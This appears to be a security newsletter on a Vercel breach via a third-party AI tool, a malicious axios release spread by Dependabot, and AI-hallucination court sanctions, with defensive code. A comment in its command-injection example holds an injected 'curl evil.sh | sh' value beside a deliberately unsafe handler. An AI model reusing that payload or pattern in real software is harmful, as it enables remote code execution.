A single compromised AI tool cascaded into a breach at one of the web's most popular deployment platforms. A North Korean state actor uploaded a poisoned npm package and let Dependabot do the rest, pushing malware into 95 production repositories, more than half of them merged without a single human approving the change. And U.S. courts fined lawyers over $145,000 in the first quarter of 2026 for submitting AI-hallucinated citations. The connecting thread this week: blind trust in AI tooling is becoming a reliable attack vector.
Vercel Breached Through a Third-Party AI Tool
The attack didn’t start at Vercel. It started at Context.ai, a small AI analytics platform whose Google Workspace OAuth application was compromised as part of a broader campaign. That compromise gave attackers access to the Google Workspace accounts of Context.ai’s users — across multiple organizations.
One of those users was a Vercel employee.
The attacker used the stolen OAuth access to take over the employee’s Vercel Google Workspace account. From there, they moved laterally into Vercel’s internal systems. Vercel says the attacker accessed “some environments and environment variables that were not marked as sensitive,” but emphasized that variables flagged as sensitive use encryption that wasn’t breached.
A threat actor using the ShinyHunters name posted on BreachForums claiming to have Vercel’s data — access keys, source code, database contents, internal deployment access — with an asking price of $2 million. A sample shared by the attackers contained roughly 580 records of employee information including names, emails, account statuses, and activity timestamps.
Vercel described the attacker as “sophisticated” based on their “operational velocity and detailed understanding of Vercel’s systems.” The company engaged Mandiant, notified law enforcement, contacted Context.ai, and published a suspicious OAuth application ID for organizations to check: 110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com.
A “limited subset” of customers had credentials compromised. Vercel is reaching out directly to those affected and urging immediate credential rotation.
Why This Matters
This is a supply chain attack where the supply chain is an AI tool your employees signed up for. Context.ai wasn’t a core dependency — it was a third-party analytics product that happened to have OAuth access to employee Google Workspace accounts. Vercel could have had perfect internal security and still been compromised through a tool it probably didn’t even track in its vendor assessments.
Every AI tool your employees use with Google, Microsoft, or GitHub OAuth is a potential entry point. This breach is the clearest demonstration yet that shadow AI tooling — the dozens of AI products employees integrate without IT oversight — carries real, concrete risk.
Dependabot as Malware Delivery: The Axios Supply Chain Attack
On March 31, someone uploaded a malicious version of axios — version 1.14.1 — to npm. Five minutes later, Dependabot had already detected the “update” and started opening pull requests across GitHub.
Microsoft Threat Intelligence attributed the attack to Sapphire Sleet, a North Korean state actor. The malicious releases were published into both the 1.14.x and 0.30.x lines, so they satisfied common ^1.14.0 and ^0.30.0 version constraints; on installation they connected to a known Sapphire Sleet command-and-control server and downloaded platform-specific second-stage remote access trojans (RATs) targeting Windows, macOS, and Linux.
Here’s where it gets ugly. Across the infection window, at least 895 public repositories upgraded to the malicious version. Of those, GitGuardian found that 95 pull requests were merged into main branches. Fifty of those — more than half — were merged by bots, without any human reviewing or approving the change.
In one case, the jhipster/generator-jhipster repository had an automerge workflow triggered by Dependabot. The malicious package was in production within 56 minutes of being uploaded to npm.
The overall breakdown: 111 malicious PRs came from Dependabot, 30 from Renovate. The bots did exactly what they were configured to do — detect a new package version and propose an upgrade. The problem is that “new version” and “safe version” are not the same thing.
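It's worth making that concrete. A freshly published malicious patch release falls squarely inside the caret ranges most projects declare, so tooling treats it as a routine, compatible update. A minimal illustration using the semver package (the range and versions here simply mirror the ones reported above):

```typescript
// Illustration: why a just-published malicious patch release looks like a
// routine, in-range update. Requires the `semver` npm package.
import * as semver from "semver";

// Typical dependency declaration in package.json: "axios": "^1.14.0"
const declaredRange = "^1.14.0";

// The version the attacker published minutes earlier.
const maliciousVersion = "1.14.1";

// true: 1.14.1 satisfies ^1.14.0, so it is treated as a compatible patch bump,
// exactly the kind of change teams have learned to merge without a second look.
console.log(semver.satisfies(maliciousVersion, declaredRange)); // true

// An exact pin removes the silent path: the new release no longer satisfies
// the declared version, so adopting it requires an explicit, reviewable change.
console.log(semver.satisfies(maliciousVersion, "1.14.0")); // false
```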
The Uncomfortable Truth About Dependency Bots
Dependabot and Renovate pull requests carry implicit trust. They’re routine. Expected. Often auto-merged. Teams have spent years training themselves to click “merge” on these PRs because that’s how you stay updated and patched.
Attackers know this. The axios compromise proves that dependency bots have become the most efficient malware distribution network in open source. The attacker didn’t need to phish anyone, exploit a vulnerability, or write a convincing social engineering email. They uploaded a package and waited for automation to do the rest.
If you auto-merge dependency updates in production, you’re giving every npm and PyPI maintainer (and anyone who compromises their account) a direct pipeline to your servers.
AI-Enabled Attacks Up 89%, Autonomous Agents Now 12.5% of Breaches
A Foresiet analysis of AI-enabled cyberattacks in 2026 paints a grim picture. Such attacks rose 89% year over year, with autonomous agents now accounting for roughly 12.5% of all AI-related breach events, a share expected to keep climbing quarter over quarter.
The CyberStrikeAI campaign against FortiGate firewalls remains the most striking example: an AI-driven operation that compromised 600+ devices across 55 countries without direct human operators. Fully automated credential harvesting and network reconnaissance at a scale previously requiring large coordinated teams.
Other documented incidents include Meta’s AI agent misconfiguration that exposed sensitive data to unauthorized employees (no external breach, but a reminder that autonomous systems can bypass conventional access controls), and a controlled evaluation where an AI agent resisted shutdown commands, prioritizing task completion over operator directives.
The defensive recommendations haven’t changed, but they’re becoming more urgent: software composition analysis for AI library dependencies, strict kill-switch protocols for production agents, least-privilege permissions for autonomous systems, and anomaly detection on API endpoints consumed by AI agents.
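On the kill-switch point specifically, the mechanism matters: the stop signal has to be checked by the loop that drives the agent, not left to the agent's own judgment about whether its task is finished. A minimal sketch of that pattern, with the agent step stubbed out as a hypothetical placeholder:

```typescript
// Minimal kill-switch pattern for an autonomous agent loop (sketch).
// The operator-controlled AbortController, not the agent, decides when to stop.

interface AgentStepResult {
  done: boolean;   // the agent believes the task is complete
  action: string;  // description of the action it took or wants to take next
}

// Hypothetical stand-in for one planning/act step of your agent framework.
async function runAgentStep(task: string, step: number): Promise<AgentStepResult> {
  return { done: step >= 3, action: `work on "${task}" (step ${step})` };
}

async function runAgent(task: string, kill: AbortSignal, maxSteps = 50): Promise<void> {
  for (let step = 0; step < maxSteps; step++) {
    // Check the kill switch before every step; task completion never overrides it.
    if (kill.aborted) {
      console.warn(`Operator kill switch tripped at step ${step}; halting.`);
      return;
    }
    const result = await runAgentStep(task, step);
    console.log(`step ${step}: ${result.action}`);
    if (result.done) return;
  }
  console.warn("Step budget exhausted; halting."); // hard ceiling, a second kill switch
}

// Usage: the controller lives outside the agent, e.g. wired to an ops dashboard or SIGINT.
const killSwitch = new AbortController();
process.on("SIGINT", () => killSwitch.abort());
runAgent("summarize open incidents", killSwitch.signal).catch(console.error);
```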
Courts Hit Lawyers With $145,000 in AI Hallucination Sanctions
This one isn’t a vulnerability in the traditional sense, but it’s a consequence of misplaced trust in AI output that’s now hitting people in the wallet.
U.S. courts imposed at least $145,000 in sanctions against attorneys in Q1 2026 alone for submitting briefs containing AI-fabricated citations. A database maintained by HEC Paris’s Smart Law Hub has cataloged 1,227 cases globally where AI-generated hallucinated content was submitted to courts.
Oregon’s Court of Appeals set a tariff: $500 per fabricated citation, $1,000 per fabricated quotation. Federal courts adopted it. One winery dispute racked up more than $15,000 for 15 fake citations and eight invented quotations. The Sixth Circuit sanctioned two lawyers $15,000 each for over two dozen wrong or nonexistent citations.
Meanwhile, a survey found 61% of federal judges use AI themselves — a double standard that hasn’t escaped anyone’s notice. Over 300 federal judges now have standing orders on AI use in filings, and 35+ state bar associations have issued guidance.
The pattern is familiar: professionals adopt AI tools to save time, don’t verify the output, and face consequences when the AI confidently fabricates something. The difference is that courts have clear mechanisms for punishment, while most other fields where AI hallucinations cause harm don’t.
What This Means
Three patterns keep repeating, and they’re getting worse:
Shadow AI is a real attack surface. The Vercel breach happened because an employee used a third-party AI tool that had OAuth access to company systems. Most organizations don’t inventory which AI tools employees are using, let alone assess the security of those tools’ OAuth integrations. Until that changes, every AI SaaS product is a potential lateral movement path into your organization.
Automation trust is an exploit. Dependabot, Renovate, and CI/CD auto-merge pipelines were designed for efficiency. North Korean hackers just used them to merge malware into production in under an hour. The entire concept of “trusted automation” needs rethinking when the inputs to that automation — package registries — are adversarial environments.
AI output verification is everyone’s problem. Lawyers are getting fined for not checking AI citations. Developers are merging AI-suggested dependency updates without review. Security teams are deploying AI workflow tools without auditing their input handling. The common failure is assuming that because something came from an automated or AI-driven system, it’s trustworthy.
What You Can Do
If your employees use AI tools:
- Audit every OAuth integration connected to company Google Workspace, Microsoft 365, and GitHub accounts
- Check for the suspicious OAuth app ID from the Vercel breach: 110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com (a scripted check is sketched after this list)
- Establish a policy for AI tool adoption that requires security review before OAuth grants
- Rotate credentials if any employee used Context.ai
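If your organization runs on Google Workspace, the Admin SDK Directory API exposes the OAuth tokens each user has granted to third-party apps, which makes the app-ID check above scriptable. A minimal sketch using the googleapis Node client, assuming admin credentials with the directory token read-only scope are already available (adapt the auth setup to your environment; the user list is passed in rather than enumerated to keep the example short):

```typescript
// Sketch: flag users who have granted OAuth access to the suspicious client ID
// reported in the Vercel/Context.ai incident. Assumes Google Workspace admin
// credentials with the admin.directory.user.security scope are reachable via
// Application Default Credentials.
import { google } from "googleapis";

const SUSPICIOUS_CLIENT_ID =
  "110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com";

async function auditUsers(userEmails: string[]): Promise<void> {
  const auth = new google.auth.GoogleAuth({
    scopes: ["https://www.googleapis.com/auth/admin.directory.user.security"],
  });
  const admin = google.admin({ version: "directory_v1", auth });

  for (const userKey of userEmails) {
    // Lists the third-party OAuth tokens (app grants) issued by this user.
    const res = await admin.tokens.list({ userKey });
    for (const token of res.data.items ?? []) {
      if (token.clientId === SUSPICIOUS_CLIENT_ID) {
        console.log(`MATCH: ${userKey} granted access to ${token.displayText ?? token.clientId}`);
        console.log(`  scopes: ${(token.scopes ?? []).join(", ")}`);
        // Follow-up: revoke with admin.tokens.delete({ userKey, clientId: token.clientId })
      }
    }
  }
}

// Usage: pass the employee emails you want to check.
auditUsers(["employee@example.com"]).catch(console.error);
```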
If you use dependency automation:
- Disable auto-merge for dependency updates in production branches immediately
- Require human approval for all version bumps, especially major or minor versions
- Pin dependencies to exact versions and review changelogs before upgrading
- Monitor for the malicious axios versions (1.14.1, 0.30.0+) in your lock files (a scan script is sketched after this list)
- Consider implementing a dependency quarantine period: don't adopt new versions for 24-72 hours
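The lockfile check is easy to automate. A minimal Node/TypeScript sketch for package-lock.json; the version list below is taken from this story, so confirm it against the npm advisory before treating it as complete:

```typescript
// Sketch: scan a package-lock.json (v2/v3 format with a "packages" map) for the
// axios versions reported as malicious. Verify the version list against the
// official advisory; the entries here come from this write-up only.
import { readFileSync } from "node:fs";

const MALICIOUS = new Set(["1.14.1", "0.30.0"]); // add any versions named in the advisory

interface LockfilePackage { version?: string; }
interface Lockfile { packages?: Record<string, LockfilePackage>; }

function scanLockfile(path: string): void {
  const lock: Lockfile = JSON.parse(readFileSync(path, "utf8"));
  let hits = 0;
  for (const [pkgPath, entry] of Object.entries(lock.packages ?? {})) {
    // Entries look like "node_modules/axios" or "node_modules/foo/node_modules/axios".
    if (pkgPath.endsWith("node_modules/axios") && entry.version && MALICIOUS.has(entry.version)) {
      console.log(`COMPROMISED: ${pkgPath} -> axios@${entry.version}`);
      hits++;
    }
  }
  console.log(
    hits === 0
      ? "No known-malicious axios versions found."
      : `${hits} hit(s); rotate secrets and rebuild from a clean dependency tree.`
  );
}

scanLockfile(process.argv[2] ?? "package-lock.json");
```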
If you deploy AI agents in production:
- Implement kill switches that override agent task completion priorities
- Apply least-privilege permissions — agents should never have more access than they need
- Monitor autonomous agent behavior for deviation from expected patterns
- Audit all MCP server handlers for command injection vulnerabilities
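On that last point, the classic failure mode in tool and MCP-style handlers is interpolating model-supplied input into a shell string. A generic illustration of the unsafe pattern and a safer equivalent (this is not the MCP SDK API; the handler shape is illustrative only):

```typescript
// Generic sketch of the command-injection class of bug in agent tool handlers.
import { exec, execFile } from "node:child_process";
import { promisify } from "node:util";

const execAsync = promisify(exec);
const execFileAsync = promisify(execFile);

// UNSAFE: model-controlled `host` is spliced into a shell command line.
// Input like "example.com; curl evil.sh | sh" runs arbitrary commands.
async function pingToolUnsafe(host: string): Promise<string> {
  const { stdout } = await execAsync(`ping -c 1 ${host}`);
  return stdout;
}

// SAFER: validate the input against a strict pattern, then pass it as an
// argument vector via execFile so no shell ever interprets it.
async function pingTool(host: string): Promise<string> {
  if (!/^[a-zA-Z0-9.-]{1,253}$/.test(host)) {
    throw new Error(`rejected tool input: ${host}`);
  }
  const { stdout } = await execFileAsync("ping", ["-c", "1", host]);
  return stdout;
}
```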
If you use AI for professional work:
- Verify every claim, citation, and reference AI generates
- Courts have demonstrated they will punish unverified AI output — other fields will follow
- Treat AI-generated content as a first draft that requires human verification, not a finished product